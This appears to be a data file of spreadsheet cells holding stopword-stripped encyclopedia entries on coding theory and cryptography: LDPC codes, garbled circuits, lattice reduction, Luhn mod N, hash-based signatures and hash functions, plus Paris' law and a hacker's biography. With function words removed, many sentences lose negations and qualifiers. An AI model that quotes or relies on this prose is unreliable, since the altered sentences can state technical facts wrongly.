ability informed dynamic scheduling (ids) algorithm overcome trapping sets near codewords.when nonflooding scheduling algorithms used, alternative definition iteration used. ldpc code rate k/n, full iteration occurs variable constraint nodes updated, matter order updated. code construction large block sizes, ldpc codes commonly constructed first studying behaviour decoders. block size tends infinity, ldpc decoders shown noise threshold decoding reliably achieved, decoding achieved, colloquially referred cliff effect. this threshold optimised finding best proportion arcs check nodes arcs variable nodes. approximate graphical approach visualising threshold exit chart. construction specific ldpc code optimization falls main types techniques: pseudorandom approaches combinatorial approachesconstruction pseudo-random approach builds theoretical results that, large block size, random construction gives good decoding performance. general, pseudorandom codes complex encoders, pseudorandom codes best decoders simple encoders. various constraints often applied help ensure desired properties expected theoretical limit infinite block size occur finite block size. combinatorial approaches used optimize properties small block-size ldpc codes create codes simple encoders. some ldpc codes based reed–solomon codes, rs-ldpc code used gigabit ethernet standard. compared randomly generated ldpc codes, structured ldpc codes—such ldpc code used dvb-s2 standard—can simpler therefore lower-cost hardware—in particular, codes constructed matrix circulant matrix.yet another constructing ldpc codes finite geometries. this method proposed 2001. ldpc codes turbo codes ldpc codes compared powerful coding schemes, e.g. turbo codes. hand, performance turbo codes influenced codes limitations. ldpc codes limitations minimum distance, indirectly means ldpc codes efficient relatively large code rates (e.g. 3/4, 5/6, 7/8) turbo codes. however, ldpc codes complete replacement: turbo codes best solution lower code rates (e.g. 1/6, 1/3, 1/2). also people robert gallager richard hamming claude shannon david mackay irving reed michael luby theory belief propagation graph theory hamming code linear code sparse graph code expander code applications g.hn/g.9960 (itu-t standard networking power lines, phone lines coaxial cable) 802.3an 10gbase-t gigabit/s ethernet twisted pair) cmmb (china multimedia mobile broadcasting) dvb-s2 dvb-t2 dvb-c2 (digital video broadcasting, generation) dmb-t/h (digital video broadcasting) wimax (ieee 802.16e standard microwave communications) ieee 802.11n-2009 (wi-fi standard) docsis atsc (next generation north america digital terrestrial broadcasting) 3gpp (5g-nr data channel) other capacity-approaching codes turbo codes serial concatenated convolutional codes online codes fountain codes codes raptor codes repeat-accumulate codes class simple turbo codes) tornado codes (ldpc codes designed erasure decoding) polar codes references external links introducing low-density parity-check codes sarah johnson, 2010) ldpc codes brief tutorial bernhard leiner, 2005) ldpc codes wien) on-line textbook: information theory, inference, learning algorithms, david j.c. mackay, discusses ldpc codes chapter iterative decoding low-density parity check codes venkatesan guruswami, 2006) ldpc codes: introduction amin shokrollahi, 2003) belief-propagation decoding ldpc codes amir bennatan, princeton university) turbo ldpc codes: implementation, simulation, standardization (west virginia university) information theory coding (marko hennhöfer, 2011, ilmenau) discusses ldpc codes pages 74–78. ldpc codes performance results dvb-s.2 link, including ldpc coding (matlab) source code encoding, decoding, simulating ldpc codes available variety locations: binary ldpc codes binary ldpc codes python (core algorithm ldpc encoder ldpc decoder matlab fast forward error correction toolbox (aff3ct) c++11 fast ldpc simulations</t>
  </si>
  <si>
    <t>Paris' law</t>
  </si>
  <si>
    <t>paris' (also known paris–erdogan equation) crack growth equation gives rate growth fatigue crack. stress intensity factor {\displaystyle characterises load around crack rate crack growth experimentally shown function range stress intensity {\displaystyle \delta seen loading cycle. paris equation {\displaystyle {\begin{aligned}{da \over dn}&amp;=c\left(\delta k\right)^{m},\end{aligned}}} {\displaystyle crack length {\displaystyle {\rm {d}}a/{\rm {d}}n} fatigue crack growth load cycle {\displaystyle material coefficients {\displaystyle {\displaystyle obtained experimentally also depend environment, frequency, temperature stress ratio. stress intensity factor range found correlate rate crack growth variety different conditions difference maximum minimum stress intensity factors load cycle defined {\displaystyle \delta k=k_{\text{max}}-k_{\text{min}}.} being power relationship crack growth rate cyclic loading range stress intensity factor, paris–erdogan equation visualized straight line log-log plot, x-axis denoted range stress intensity factor y-axis denoted crack growth rate. equation gives growth single cycle. single cycles readily counted constant-amplitude loading. additional cycle identification techniques rainflow-counting algorithm need used extract equivalent constant-amplitude cycles variable-amplitude loading sequence. history 1961 paper, paris introduced idea rate crack growth depend stress intensity factor. then 1963 paper, paris erdogan indirectly suggested equation aside remark "the authors hesitant cannot resist temptation draw straight line slope data" reviewing data log-log plot crack growth versus stress intensity range. paris equation presented fixed exponent domain applicability stress ratio higher mean stress known increase rate crack growth known mean stress effect. mean stress cycle expressed terms stress ratio {\displaystyle defined {\displaystyle r={k_{\text{min}} \over k_{\text{max}}},} ratio minimum maximum stress intensity factors. linear elastic fracture regime, {\displaystyle also equivalent load ratio {\displaystyle r\equiv {p_{\text{min}} \over p_{\text{max}}}.} paris–erdogan equation explicitly include effect stress ratio, although equation coefficients chosen specific stress ratio. other crack growth equations forman equation explicitly include effect stress ratio, elber equation modelling effect crack closure. intermediate stress intensity range paris–erdogan equation holds mid-range growth rate regime, apply values {\displaystyle \delta approaching threshold value {\displaystyle \delta k_{\text{th}}} high values approaching material's fracture toughness, {\displaystyle k_{\text{ic}}} alternating stress intensity critical limit given {\displaystyle {\begin{aligned}\delta k_{\text{cr}}&amp;=(1-r)k_{\text{ic}}\end{aligned}}} .the slope crack growth rate curve log-log scale denotes value exponent {\displaystyle typically found {\displaystyle {\displaystyle although materials static fracture toughness high-strength steels, value {\displaystyle high {\displaystyle long cracks because size plastic zone {\displaystyle (r_{\text{p}}\approx k_{i}^{2}/\sigma _{y}^{2})} small comparison crack length, {\displaystyle (here, {\displaystyle \sigma _{y}} yield stress), approximation small-scale yielding applies, enabling linear elastic fracture mechanics stress intensity factor. thus, paris–erdogan equation valid linear elastic fracture regime, tensile loading long cracks. references</t>
  </si>
  <si>
    <t>Garbled circuit</t>
  </si>
  <si>
    <t>garbled circuit cryptographic protocol enables two-party secure computation mistrusting parties jointly evaluate function private inputs without presence trusted third party. garbled circuit protocol, function described boolean circuit. history garbled circuits complicated. invention garbled circuit credited andrew yao, introduced idea oral presentation paper focs'86. this documented oded goldreich 2003. first written document technique goldreich, micali, wigderson stoc'87. term "garbled circuit" first used beaver, micali, rogaway stoc'90. yao's protocol solving yao's millionaires' problem beginning example secure computation, directly related garbled circuits. background oblivious transfer garbled circuit protocol, make oblivious transfer. oblivious transfer, string transferred sender receiver following way: sender strings {\displaystyle s_{0}} {\displaystyle s_{1}} receiver chooses {\displaystyle i\in \{0,1\}} sender sends {\displaystyle s_{i}} oblivious transfer protocol receiver gain information unsent string {\displaystyle s_{(1-i)}} value {\displaystyle exposed sender.note receiver know {\displaystyle s_{0},s_{1}} values, practice receiver knows information {\displaystyle s_{i}} encodes receiver blindly choosing {\displaystyle that {\displaystyle s_{0}} encodes false value, {\displaystyle s_{1}} encodes true value receiver wants encoded true value, receiver chooses {\displaystyle i=1} oblivious transfer built using asymmetric cryptography like cryptosystem. definitions notations operator {\displaystyle \parallel string concatenation. operator {\displaystyle \oplus bit-wise xor. security parameter length keys. greater usually 128. garbled circuit protocol protocol consists steps follows: underlying function (e.g., millionaires' problem, comparison function) described boolean circuit 2-input gates. circuit known parties. this step done beforehand third-party. alice garbles (encrypts) circuit. call alice garbler. alice sends garbled circuit along encrypted input. order calculate circuit, needs garble input well. end, needs alice help him, garbler knows encrypt. finally, encrypt input oblivious transfer. terms definition above, receiver alice sender oblivious transfer. evaluates (decrypts) circuit obtains encrypted outputs. call evaluator. alice communicate learn output. circuit generation boolean circuit small functions generated hand. conventional make circuit 2-input gates. important generated circuit minimum number gates (see free optimization). there methods generate optimized circuit term number gates using logic synthesis technique. circuit millionaires' problem digital comparator circuit (which chain full adders working subtractor outputting carry flag). full adder circuit implemented using gate gates. this means total number gates circuit millionaires' problem equal bit-width inputs. garbling alice (garbler) encrypts boolean circuit step obtain garbled circuit. alice assigns randomly generated strings called labels wire circuit: boolean semantic (the label k-bit long security parameter usually 128.) next, goes gates circuit replaces truth tables corresponding labels. table shows truth table gate inputs {\displaystyle w^{a},w^{b}} output {\displaystyle w^{c}} alice replaced corresponding labels: encrypts output entry truth table corresponding input labels. encrypted table called garbled table. this done decrypt garbled table correct input labels. table below, {\displaystyle enc_{k}(x)} double-key symmetric encryption secret value encrypted (see fixed-key blockcipher). after this, alice randomly permutes table output value cannot determined row. protocol's name, garbled, derived random permutation. data transfer alice sends computed garbled tables gates circuit bob. needs input labels open garbled tables. thus, alice chooses labels corresponding input {\displaystyle sends bob. example, alice's input 01101 {\displaystyle \mathbf =a_{4}a_{3}a_{2}a_{1}a_{0}=01101} sends {\displaystyle x_{0}^{a_{4}}} {\displaystyle x_{1}^{a_{3}}} {\displaystyle x_{1}^{a_{2}}} {\displaystyle x_{0}^{a_{1}}} {\displaystyle x_{1}^{a_{0}}} bob. learn anything alice's input, {\displaystyle \mathbf since labels randomly generated alice look like random strings bob. needs labels corresponding input well. receives labels oblivious transfers input. example, bob's input 10100 {\displaystyle \mathbf =b_{4}b_{3}b_{2}b_{1}b_{0}=10100} first asks {\displaystyle b_{0}=0} alice's labels {\displaystyle x_{0}^{b_{0}}} {\displaystyle x_{1}^{b_{0}}} through 1-out-of-2 oblivious transfer, receives {\displaystyle x_{0}^{b_{0}}} after oblivious transfers, alice learn anything bob's input learn anything labels. evaluation after data transfer, garbled tables input labels. goes gates tries decrypt rows garbled tables. able open table retrieve corresponding output label: {\displaystyle x^{c}=dec_{x^{a},x^{b}}(garbled\_table[i])} {\displaystyle 0\leq i\leq continues evaluation reaches output labels. revealing output after evaluation, obtains output label, {\displaystyle x^{c}} alice knows mapping boolean value since labels: {\displaystyle x_{0}^{c}} {\displaystyle x_{1}^{c}} either alice share information reveal output alice learn output. optimization point-and-permute optimization, alice generates random bit, {\displaystyle called select wire {\displaystyle w^{a}} sets first label {\displaystyle x_{0}^{a}} {\displaystyle first label {\displaystyle x_{1}^{a}} {\displaystyle {\bar {s}}} (not {\displaystyle then, instead randomly permuting, sorts garbled table according inputs select bit. this way, need test four rows table find correct one, since input labels find correct decrypt attempt. this reduces evaluation load times. also reveal anything output value select bits randomly generated. reduction this optimization reduces size garbled tables rows rows. here, instead generating label output wire gate randomly, alice generates using function input labels. generates output labels first entry garbled table becomes longer needs sent: {\displaystyle {\begin{aligned}&amp;enc_{x_{0}^{a},x_{0}^{b}}(x_{0}^{c})=0\\&amp;x_{0}^{c}=dec_{x_{0}^{a},x_{0}^{b}}(0).\end{aligned}}} free optimization, alice generates global random (k-1)-bit value {\displaystyle kept secret. during garbling input gates {\displaystyle w^{a}} {\displaystyle w^{b}} generates labels {\displaystyle (x_{0}^{a},x_{0}^{b})} computes labels {\displaystyle x_{1}^{a}=x_{0}^{a}\oplus (r\parallel {\displaystyle x_{1}^{b}=x_{0}^{b}\oplus (r\parallel using values, label gate's output wire {\displaystyle w^{c}} input wires {\displaystyle w^{a}} {\displaystyle w^{b}} {\displaystyle x^{c}=x^{a}\oplus x^{b}} proof security random oracle model optimization given free-xor paper. implication free optimization implies important point amount data transfer (communication) number encryption decryption (computation) garbled circuit protocol relies number gates boolean circuit gates. thus, boolean circuits representing function, smaller number gates preferred. fixed-key blockcipher this method allows efficiently garble evaluate gates using fixed-key aes, instead costly cryptographic hash function like sha-2. garbling scheme compatible free reduction techniques, output {\displaystyle x^{c}} encrypted input token {\displaystyle x^{a}} {\displaystyle x^{b}} using encryption function {\displaystyle enc(x^{a},x^{b},t,x^{c})=\pi (k)\oplus k\oplus x^{c}} {\displaystyle k=2x^{a}\oplus 4x^{b}\oplus {\displaystyle fixed-key block cipher (e.g., instantiated aes), {\displaystyle unique-per-gate number (e.g., gate identifier) called tweak. half this optimization reduce size garbled table gates reduction rows. shown theoretical minimum number rows garbled table, certain class garbling techniques. security yao's garbled circuit secure semi-honest adversary. this type adversary follows protocol malicious behavior, tries violate privacy party's input scrutinizing messages transmitted protocol. challenging make protocol secure malicious adversary deviates protocol. first solutions make protocol secure malicious adversary zero-knowledge proof prevent malicious activities protocol. years, approach considered theoretical solution practical solution complexity overheads but, shown possible small overhead. another approach using several circuit verifying correctness subset using rest computation hope garbler malicious, would detected verification phase. another solution make garbling scheme authenticated evaluator verify garbled circuit. also cryptography secure multi-party computation yao's millionaires' problem references further reading "yao's garbled circuit" (pdf). cs598. illinois.edu. retrieved october 2016.</t>
  </si>
  <si>
    <t>Korkine–Zolotarev lattice basis reduction algorithm</t>
  </si>
  <si>
    <t>korkine–zolotarev (kz) lattice basis reduction algorithm hermite-korkine–zolotarev (hkz) algorithm lattice reduction algorithm. lattices {\displaystyle \mathbb ^{n}} yields lattice basis orthogonality defect {\displaystyle n^{n}} unlike {\displaystyle 2^{n/2}} bound reduction. exponential complexity versus polynomial complexity reduction algorithm, however still preferred solving sequences closest vector problems (cvps) lattice, efficient. history definition kz-reduced basis given korkine zolotareff 1877, strengthened version hermite reduction. first algorithm constructing kz-reduced basis given 1983 kannan.the block korkine-zolotarev (bkz) algorithm introduced 1987. definition kz-reduced basis lattice defined follows:given basis {\displaystyle \mathbf =\{\mathbf _{1},\mathbf _{2},\dots ,\mathbf _{n}\},} define gram–schmidt process orthogonal basis {\displaystyle \mathbf ^{*}=\{\mathbf _{1}^{*},\mathbf _{2}^{*},\dots ,\mathbf _{n}^{*}\},} gram-schmidt coefficients {\displaystyle _{i,j}={\frac {\langle \mathbf _{i},\mathbf _{j}^{*}\rangle }{\langle \mathbf _{j}^{*},\mathbf _{j}^{*}\rangle {\displaystyle 1\leq j&lt;i\leq .also define projection functions {\displaystyle _{i}(\mathbf )=\sum _{j\geq i}{\frac {\langle \mathbf ,\mathbf _{j}^{*}\rangle }{\langle \mathbf _{j}^{*},\mathbf _{j}^{*}\rangle }}\mathbf _{j}^{*}} project {\displaystyle \mathbf orthogonally onto span {\displaystyle \mathbf _{i}^{*},\cdots ,\mathbf _{n}^{*}} then basis {\displaystyle kz-reduced following holds: {\displaystyle \mathbf _{i}^{*}} shortest nonzero vector {\displaystyle _{i}({\mathcal {l}}(\mathbf {\displaystyle j&lt;i} {\displaystyle \left|\mu _{i,j}\right|\leq 1/2} note first condition reformulated recursively stating {\displaystyle \mathbf _{1}} shortest vector lattice, {\displaystyle \{\pi _{1}(\mathbf _{2}),\cdots _{1}(\mathbf _{n})\}} kz-reduced basis lattice {\displaystyle _{1}({\mathcal {l}}(\mathbf also note second condition guarantees reduced basis length-reduced (adding integer multiple basis vector another decrease length); condition used reduction. notes references korkine, zolotareff, (1877). "sur formes quadratiques positives". mathematische annalen. (2): 242–292. doi:10.1007/bf01442667. s2cid 121803621.lyu, shanxiang; ling, cong (2017). "boosted algorithms" (pdf). ieee transactions signal processing. (18): 4784–4796. arxiv:1703.03303. bibcode:2017itsp...65.4784l. doi:10.1109/tsp.2017.2708020. s2cid 16832357.wen, jinming; chang, xiao-wen (2018). reduction" (pdf). arxiv:1702.08152. {{cite journal}}: cite journal requires |journal= (help)micciancio, daniele; goldwasser, shafi (2002). complexity lattice problems. 131–136. doi:10.1007/978-1-4615-0897-7. isbn 978-1-4613-5293-8.zhang, wen; qiao, sanzheng; wei, yimin (2012). "hkz minkowski reduction algorithms lattice-reduction-aided mimo detection" (pdf). ieee transactions signal processing. (11): 5963. bibcode:2012itsp...60.5963z. doi:10.1109/tsp.2012.2210708. s2cid 5962834.</t>
  </si>
  <si>
    <t>Loyd Blankenship</t>
  </si>
  <si>
    <t>loyd blankenship (born 1965), better known pseudonym mentor, well-known computer hacker writer. active since 1970s, member hacker groups extasyy elite legion doom. writings hacker manifesto author conscience hacker (also known hacker manifesto); essay written arrested published ezine phrack. since essay's publication 1986, subject numerous panels t-shirts. role-playing games blankenship hired steve jackson games 1989. authored cyberpunk role-playing sourcebook gurps cyberpunk, manuscript seized 1990 raid steve jackson games headquarters u.s. secret service. raid resulted subsequent legal case steve jackson games, inc. united states secret service. references external links elfqrin.com interview mentor (july 2000) loyd blankenship imdb "the conscience hacker", published phrack volume issue</t>
  </si>
  <si>
    <t>Alternant code</t>
  </si>
  <si>
    <t>coding theory, alternant codes form class parameterised error-correcting codes generalise codes. definition alternant code gf(q) length defined parity check matrix alternant form hi,j αjiyi, distinct elements extension gf(qm), non-zero parameters extension gf(qm) indices range properties parameters alternant code length dimension minimum distance there exist long alternant codes meet gilbert–varshamov bound. class alternant codes includes codes goppa codes srivastava codes references f.j. macwilliams; n.j.a. sloane (1977). theory error-correcting codes. north-holland. 332–338. isbn 0-444-85193-3.</t>
  </si>
  <si>
    <t>Luhn mod N algorithm</t>
  </si>
  <si>
    <t>luhn algorithm extension luhn algorithm (also known algorithm) allows work sequences values even-numbered base. this useful check digit required validate identification string composed letters, combination letters digits arbitrary characters divisible informal explanation luhn algorithm generates check digit (more precisely, check character) within range valid characters input string. example, algorithm applied string lower-case letters check character also lower-case letter. apart distinction, resembles closely original algorithm. main idea behind extension full valid input characters mapped list code-points (i.e., sequential integers beginning zero). algorithm processes input string converting character associated code-point performing computations (where number valid input characters). finally, resulting check code-point mapped back obtain corresponding check character. limitation luhn algorithm works divisable this operation correct value position doubling value work divisable applications using english alphabet problem, since string lower-case letters code-points, adding decimal characters adds maintaining divisable explanation second step luhn algorithm re-packs doubled value position original digit's base adding together individual digits doubled value written base this step results even numbers doubled value less equal numbers doubled value greater example, decimal applications original values result even numbers original values result numbers, effectively re-packing doubled values single distinct result where used divisable step returns even numbers doubled values greater cannot distinguished doubled values less equal outcome algorithm neither detect single-digit errors transpositions adjacent digits used divisable detection capabilities algorithm's primary strengths, algorithm weakened almost entirely limitation. luhn algorithm variation enables applications divisable replacing doubled value position remainder dividing position's value gives number remainders consistent original algorithm design. mapping characters code-points initially, mapping valid input characters code-points must created. example, consider valid characters lower-case letters therefore, suitable mapping would note order characters completely irrelevant. this mapping would also acceptable (although possibly cumbersome implement): also possible intermix letters digits (and possibly even characters). example, mapping would appropriate lower-case hexadecimal digits: algorithm assuming following functions defined: function generate check character function validate string (with check character last character) algorithm java assuming following functions defined: function generate check character function validate string (with check character last character) algorithm javascript assuming following functions defined: function generate check character function validate string (with check character last character) example generation consider valid input characters example input string abcdef. generate check character, start last character string move left doubling every code-point. "digits" code-points written base (since valid input characters) summed total digits number must added obtain next multiple case, this resulting check code-point. associated check character validation resulting string abcdefe validated using similar procedure: total digits since divisible check character valid. implementation mapping characters code-points back implemented number ways. simplest approach (akin original luhn algorithm) ascii code arithmetic. example, given input code-point calculated subtracting ascii code ascii code desired character. reverse operation provide reverse mapping. additional ranges characters dealt using conditional statements. non-sequential sets mapped ways using hard-coded switch/case statement. flexible approach something similar associative array. work, pair arrays required provide two-way mapping. additional possibility array characters array indexes code-points associated character. mapping character code-point performed linear binary search. case, reverse mapping simple array lookup. weakness this extension shares weakness original algorithm, namely, cannot detect transposition sequence &lt;first-valid-character&gt;&lt;last-valid-character&gt; &lt;last-valid-character&gt;&lt;first-valid-character&gt; vice versa). this equivalent transposition (assuming valid input characters order). positive note, larger valid input characters, smaller impact weakness. also international securities identification number (isin)</t>
  </si>
  <si>
    <t>Alternating step generator</t>
  </si>
  <si>
    <t>cryptography, alternating step generator (asg) cryptographic pseudorandom number generator used stream ciphers, based three linear-feedback shift registers. output combination lfsrs stepped (clocked) alternating fashion, depending output third lfsr. design published 1987 patented 1989 günther. overview linear-feedback shift registers (lfsrs) are, statistically speaking, excellent pseudorandom generators, good distribution simple implementation. however, cannot used as-is output predicted easily. comprises three linear-feedback shift registers, call lfsr0, lfsr1 lfsr2 convenience. output registers decides used; instance lfsr2 outputs lfsr0 clocked, outputs lfsr1 clocked instead. output exclusive last produced lfsr0 lfsr1. initial state three lfsrs key. customarily, lfsrs primitive polynomials distinct close degree, preset non-zero state, lfsr generates maximum length sequence. under assumptions, asg's output demonstrably long period, high linear complexity, even distribution short subsequences. example code simple implement hardware. particular, contrary shrinking generator self-shrinking generator, output produced clock, ensuring consistent performance resistance timing attacks. security shahram khazaei, simon fischer, willi meier give cryptanalysis allowing various tradeoffs time complexity amount output needed mount attack, e.g. asymptotic complexity {\displaystyle o(l^{2}.2^{2l/3})} {\displaystyle o(2^{2l/3})} bits, {\displaystyle size shortest three lfsrs. references schneier, bruce. applied cryptography (p383-384), second edition, john wiley sons, 1996. isbn 0-471-11709-9</t>
  </si>
  <si>
    <t>Hash-based cryptography</t>
  </si>
  <si>
    <t>hash-based cryptography generic term constructions cryptographic primitives based security hash functions. interest type post-quantum cryptography. far, hash-based cryptography used construct digital signatures schemes merkle signature scheme, zero knowledge computationally integrity proofs, zk-stark proof system range proofs issued credentials hashwires protocol. hash-based signature schemes combine one-time signature scheme, lamport signature, merkle tree structure. since one-time signature scheme sign single message securely, practical combine many keys within single, larger structure. merkle tree structure used end. hierarchical data structure, hash function concatenation used repeatedly compute tree nodes. consideration hash-based signature schemes sign limited number messages securely, one-time signature schemes. national institute standards technology (nist), specified algorithms post-quantum cryptography competition support minimum signatures safely.in 2022, nist announced sphincs+ three algorithms standardized digital signatures. nist standardized stateful hash-based cryptography based extended merkle signature scheme (xmss) leighton-micali signatures (lms), applicable different circumstances, 2020, noted requirement maintain state using makes difficult implement avoids misuse. history leslie lamport invented hash-based signatures 1979. xmss (extended merkle signature scheme) sphincs hash-based signature schemes introduced 2011 2015, respectively. xmss developed team researchers direction johannes buchmann based merkle's seminal scheme 2007 generalized merkle signature scheme (gmss). multi-tree variant xmss, xmssmt, described 2013. one-time signature schemes hash-based signature schemes one-time signature schemes building block. given one-time signing used sign single message securely. indeed, signatures reveal part signing key. security (hash-based) one-time signature schemes relies exclusively security underlying hash function. commonly used one-time signature schemes include lamport-diffie scheme, winternitz scheme improvements, w-ots+ scheme. unlike seminal lamport-diffie scheme, winternitz scheme variants sign many bits once. number bits signed determined value: winternitz parameter. existence parameter provides trade-off size speed. large values winternitz parameter yield short signatures keys, price slower signing verifying. practice, typical value parameter case stateless hash-based signatures, few-time signature schemes used. such schemes allow security decrease gradually case few-time used once. horst example few-time signature scheme. combining many one-time pairs hash-based signature scheme central idea hash-based signature schemes combine larger number one-time pairs single structure obtain practical signing (yet limited number times). this done using merkle tree structure, possible variations. public private constructed numerous public private keys underlying one-time scheme. global public single node merkle tree. value output selected hash function, typical public size bytes. validity global public related validity given one-time public using sequence tree nodes. this sequence called authentication path. stored part signature, allows verifier reconstruct node path public keys. global private generally handled using pseudo-random number generator. sufficient store seed value. one-time secret keys derived successively seed value using generator. with approach, global private also small, e.g. typically bytes. problem tree traversal critical signing performance. increasingly efficient approaches introduced, dramatically speeding signing time. some hash-based signature schemes multiple layers tree, offering faster signing price larger signatures. schemes, lowest layer trees used sign messages, trees sign root values lower trees. naor-yung work shows pattern transfer limited time signature merkle type family unlimited (regular) signature scheme. properties hash-based signature schemes hash-based signature schemes rely security assumptions underlying hash function, hash function fulfilling assumptions used. consequence, adequate hash function yields different corresponding hash-based signature scheme. even given hash function becomes insecure, sufficient replace different, secure obtain secure instantiation hash-based signature scheme consideration. some hash-based signature schemes (such xmss pseudorandom generation) forward secure, meaning previous signatures remain valid secret compromised. minimality security assumptions another characteristic hash-based signature schemes. generally, schemes require secure (for instance sense second preimage resistance) cryptographic hash function guarantee overall security scheme. this kind assumption necessary digital signature scheme; however, signature schemes require additional security assumptions, case here. because reliance underlying one-time signature scheme, hash-based signature schemes sign fixed number messages securely. case merkle xmss schemes, maximum {\displaystyle 2^{h}} messages signed securely, {\displaystyle total merkle tree height. examples hash-based signature schemes since merkle's initial scheme, numerous hash-based signature schemes performance improvements introduced. recent ones include xmss, leighton-micali (lms), sphincs bpqs schemes. most hash-based signature schemes stateful, meaning signing requires updating secret key, unlike conventional digital signature schemes. stateful hash-based signature schemes, signing requires keeping state used one-time keys making sure never reused. xmss, bpqs schemes stateful, sphincs scheme stateless. sphincs signatures larger xmss signatures. bpqs designed specifically blockchain systems. additionally wots+ one-time signature scheme, sphincs also uses few-time (hash-based) signature scheme called horst. horst improvement older few-time signature scheme, hors (hash obtain random subset).the stateful hash-based schemes xmss xmssmt specified 8391 (xmss: extended merkle signature scheme) leighton-micali hash-based signatures specified 8554. practical improvements proposed literature alleviate concerns introduced stateful schemes. hash functions appropriate schemes include sha-2, sha-3 blake. implementations xmss, gmss sphincs schemes available java bouncy castle cryptographic apis. sphincs implemented supercop benchmarking toolkit. optimised unoptimised reference implementations xmss exist. scheme implemented python following internet-draft. references lange. "hash-based signatures". encyclopedia cryptography security, springer 2011. leighton, micali. "large provably fast secure digital signature schemes based secure hash functions". patent 5,432,852, 1995. becker. "merkle signature schemes, merkle trees their cryptanalysis", seminar 'post quantum cryptology' ruhr-university bochum, germany, 2008. dahmen, dring, klintsevich, buchmann, l.c. coronado garcia. "cmss improved merkle signature scheme". progress cryptology indocrypt 2006. merkle. "secrecy, authentication public systems certified digital signature". ph.d. dissertation, dept. electrical engineering, stanford university, 1979. micali, jakobsson, leighton, szydlo. "fractal merkle tree representation traversal". rsa-ct kampanakis, fluhrer. "lms xmss: comparison stateful hash-based signature proposed standards". cryptology eprint archive, report 2017/349. naor, shenhav, wool. "one-time signatures revisited: practical fast signatures using fractal merkle tree traversal". ieee 24th convention electrical electronics engineers israel, 2006. external links [10] commented list literature hash-based signature schemes. [11] another list references (uncommented).</t>
  </si>
  <si>
    <t>Hash function</t>
  </si>
  <si>
    <t>hash function function used data arbitrary size fixed-size values. values returned hash function called hash values, hash codes, digests, simply hashes. values usually used index fixed-size table called hash table. hash function index hash table called hashing scatter storage addressing. hash functions associated hash tables used data storage retrieval applications access data small nearly constant time retrieval. they require amount storage space fractionally greater total space required data records themselves. hashing computationally storage space-efficient form data access avoids non-constant access time ordered unordered lists structured trees, often exponential storage requirements direct access state spaces large variable-length keys. hash functions relies statistical properties function interaction: worst-case behaviour intolerably vanishingly small probability, average-case behaviour nearly optimal (minimal collision).hash functions related (and often confused with) checksums, check digits, fingerprints, lossy compression, randomization functions, error-correcting codes, ciphers. although concepts overlap extent, uses requirements designed optimized differently. hash function differs concepts mainly terms data integrity. overview hash function takes input, associated datum record used identify data storage retrieval application. keys fixed length, like integer, variable length, like name. cases, datum itself. output hash code used index hash table holding data records, pointers them. hash function considered perform three functions: convert variable-length keys fixed length (usually machine word length less) values, folding words units using parity-preserving operator like xor. scramble bits resulting values uniformly distributed keyspace. values ones less equal size tablea good hash function satisfies basic properties: fast compute; minimize duplication output values (collisions). hash functions rely generating favourable probability distributions effectiveness, reducing access time nearly constant. high table loading factors, pathological sets poorly designed hash functions result access times approaching linear number items table. hash functions designed give best worst-case performance, good performance high table loading factors, special cases, perfect (collisionless) mapping keys hash codes. implementation based parity-preserving operations (xor add), multiply, divide. necessary adjunct hash function collision-resolution method employs auxiliary data structure like linked lists, systematic probing table find empty slot. hash tables hash functions used conjunction hash tables store retrieve data items data records. hash function translates associated datum record hash code, used index hash table. when item added table, hash code index empty slot (also called bucket), case item added table there. hash code indexes full slot, kind collision resolution required: item omitted (not added table), replace item, added table location specified procedure. that procedure depends structure hash table: chained hashing, slot head linked list chain, items collide slot added chain. chains kept random order searched linearly, serial order, self-ordering list frequency speed access. open address hashing, table probed starting occupied slot specified manner, usually linear probing, quadratic probing, double hashing open slot located entire table probed (overflow). searching item follows procedure item located, open slot found entire table searched (item table). specialized uses hash functions also used build caches large data sets stored slow media. cache generally simpler hashed search table since collision resolved discarding writing back older colliding items.hash functions essential ingredient bloom filter, space-efficient probabilistic data structure used test whether element member set. special case hashing known geometric hashing grid method. applications, inputs sort metric space, hashing function interpreted partition space grid cells. table often array indices (called grid file, grid index, bucket grid, similar names), hash function returns index tuple. this principle widely used computer graphics, computational geometry many disciplines, solve many proximity problems plane three-dimensional space, finding closest pairs points, similar shapes list shapes, similar images image database, hash tables also used implement associative arrays dynamic sets. properties uniformity good hash function expected inputs evenly possible output range. that every hash value output range generated roughly probability. reason last requirement cost hashing-based methods goes sharply number collisions—pairs inputs mapped hash value—increases. hash values likely occur others, larger fraction lookup operations search larger colliding table entries. note criterion requires value uniformly distributed, random sense. good randomizing function (barring computational efficiency concerns) generally good choice hash function, converse need true. hash tables often contain small subset valid inputs. instance, club membership list contain hundred member names, large possible names. cases, uniformity criterion hold almost typical subsets entries found table, global possible entries. words, typical records hashed table slots, probability bucket receiving many records vanishingly small. particular, less buckets records. small number collisions virtually inevitable, even much larger birthday problem. special cases keys known advance static, hash function found achieves absolute collisionless) uniformity. such hash function said perfect. there algorithmic constructing function searching factorial function number keys mapped versus number table slots they're tapped into. finding perfect hash function small keys usually computationally infeasible; resulting function likely computationally complex standard hash function provides marginal advantage function good statistical properties yields minimum number collisions. universal hash function. testing measurement when testing hash function, uniformity distribution hash values evaluated chi-squared test. this test goodness-of-fit measure: actual distribution items buckets versus expected uniform) distribution items. formula {\displaystyle {\frac {\sum _{j=0}^{m-1}(b_{j})(b_{j}+1)/2}{(n/2m)(n+2m-1)}}} where: {\displaystyle number keys, {\displaystyle number buckets, {\displaystyle b_{j}} number items bucket {\displaystyle ratio within confidence interval (0.95 1.05) indicative hash function evaluated expected uniform distribution. hash functions technical properties make likely they'll uniform distribution applied. strict avalanche criterion: whenever single input complemented, output bits changes probability. reason property selected subsets keyspace variability. output uniformly distributed, amount variability, even bit, translate high amount variability (i.e. distribution tablespace) output. each change probability bits reluctant change, keys become clustered around values. bits want change readily, mapping approaching fixed function single bit. standard tests property described literature. relevance criterion multiplicative hash function assessed here. efficiency data storage retrieval applications, hash function trade-off search time data storage space. search time unbounded, compact unordered linear list would best medium; storage space unbounded, randomly accessible structure indexable key-value would large, sparse, fast. hash function takes finite amount time potentially large keyspace feasible amount storage space searchable bounded amount time regardless number keys. applications, hash function computable minimum latency secondarily minimum number instructions. computational complexity varies number instructions required latency individual instructions, simplest bitwise methods (folding), followed multiplicative methods, complex (slowest) division-based methods. because collisions infrequent, cause marginal delay otherwise harmless, usually preferable choose faster hash function needs computation saves collisions. division-based implementations particular concern division microprogrammed nearly chip architectures. divide (modulo) constant inverted become multiply word-size multiplicative-inverse constant. this done programmer, compiler. divide also reduced directly series shift-subtracts shift-adds, though minimizing number operations required daunting problem; number assembly instructions resulting 